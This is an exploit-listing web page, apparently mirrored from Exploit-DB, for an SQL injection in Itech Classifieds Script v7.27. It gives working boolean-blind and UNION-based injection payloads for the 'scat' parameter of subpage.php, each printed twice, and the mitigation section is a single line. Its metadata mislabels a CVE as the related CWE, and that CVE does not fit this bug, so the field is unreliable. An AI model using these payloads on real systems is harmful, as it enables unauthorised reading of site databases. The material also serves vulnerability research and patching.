header-logo
Suggest Exploit
vendor:
Classifieds Script
by:
Kaan KAMIS
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Classifieds Script
Affected Version From: 7.27
Affected Version To: 7.27
Patch Exists: YES
Related CWE: CVE-2017-5123
CPE: a:itechscripts:classifieds_script:7.27
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2017

Itech Classifieds Script v7.27 – SQL Injection

An SQL Injection vulnerability in Classifieds Script v7.27 allows attackers to read arbitrary data from the database. URL : http://localhost/subpage.php?scat=51[payload] Parameter: scat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: scat=51' AND 4941=4941 AND 'hoCP'='hoCP Type: UNION query Title: Generic UNION query (NULL) - 26 columns Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

Exploit Title: Itech Classifieds Script v7.27 – SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/classifieds-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

Classifieds Script v7.27 is the best classifieds software. Try this script and present yourself with a robust digital platform.

Type of vulnerability:

An SQL Injection vulnerability in Classifieds Script v7.27 allows attackers to read
arbitrary data from the database.

Vulnerability:

URL : http://localhost/subpage.php?scat=51[payload]

Parameter: scat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: scat=51' AND 4941=4941 AND 'hoCP'='hoCP

    Type: UNION query
    Title: Generic UNION query (NULL) - 26 columns
    Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES

Navigation

Suggest Exploit

Services By CQR